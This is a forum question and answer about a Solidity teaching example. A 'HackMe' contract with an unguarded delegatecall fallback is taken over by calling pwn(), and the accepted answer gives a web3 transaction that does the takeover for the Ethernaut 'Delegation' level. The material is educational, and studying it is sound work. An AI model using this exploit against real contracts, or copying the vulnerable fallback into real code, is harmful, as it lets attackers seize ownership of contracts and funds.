# delegateCall in Solidity understanding case

Tags: solidity

```
pragma solidity ^0.8.10;

/*
HackMe is a contract that uses delegatecall to execute code.
It it is not obvious that the owner of HackMe can be changed since there is no
function inside HackMe to do so. However an attacker can hijack the
contract by exploiting delegatecall. Let's see how.

1. Alice deploys Lib
2. Alice deploys HackMe with address of Lib
3. Eve deploys Attack with address of HackMe
4. Eve calls Attack.attack()
5. Attack is now the owner of HackMe

What happened?
Eve called Attack.attack().
Attack called the fallback function of HackMe sending the function
selector of pwn(). HackMe forwards the call to Lib using delegatecall.
Here msg.data contains the function selector of pwn().
This tells Solidity to call the function pwn() inside Lib.
The function pwn() updates the owner to msg.sender.
Delegatecall runs the code of Lib using the context of HackMe.
Therefore HackMe's storage was updated to msg.sender where msg.sender is the
caller of HackMe, in this case Attack.
*/

contract Lib {
    address public owner;

    function pwn() public {
        owner = msg.sender;
    }
}

contract HackMe {
    address public owner;
    Lib public lib;
    /*bool public fallbackCalisti;
    bytes public encodedData= abi.encodeWithSignature("pwn()");
    bytes public msgDatainFallback;*/


    constructor(Lib _lib) {
        owner = msg.sender;
        lib = Lib(_lib);
    }

    fallback() external payable {
        //fallbackCalisti= true;
        //msgDatainFallback= msg.data;

        address(lib).delegatecall(msg.data);
    }
}

contract Attack {
    address public hackMe;

    constructor(address _hackMe) {
        hackMe = _hackMe;
    }

    function attack() public {
        hackMe.call(abi.encodeWithSignature("pwn()"));
    }
}
```

so what the code above does is described by the comment in it what I am trying to do is to change the owner of the HackMe contract by sending some ethers and thus triggering its fallback function without using Attack contract. So what I did is, I transacted 1 Ether to HackMe contract with the data of 0xdd365b8b, which is the bytes representation of abi.encodeWithSignature("pwn()") called in the Attack contract's attack function. However it doesnt change the owner although I sucessfully trigger the fallback function in HackMe contract. Could someone help me with this? Thanks in advance. https://i.stack.imgur.com/aPtlq.png  I transact as in the image with one Ether.

Comment: There is no `delegatecall` in this code. Shouldn't be sth like this `address(lib).delegatecall(msg.data);`?

Comment: Yes sorry there was a mistake when pasting the code here. I fixed the code right now and the problem still exists. Thanks for the correction.

Answer (score 1, accepted):

I encounter a similar issue in [ethernaut 6. delegation](https://ethernaut.openzeppelin.com/level/0x9451961b7Aea1Df57bc20CC68D72f662241b5493), when using the low level interactions in Remix with CALLDATA.

An easy solution would be to use web3 instead of calling the function with remix.

This worked for me:

```
await web3.eth.sendTransaction({
  from: player, // your address
  to: contract.address, // address of HackMe contract,
  value: web3.toWei(1, "ether"),
  data: web3.eth.abi.encodeFunctionSignature('pwn()')
});
```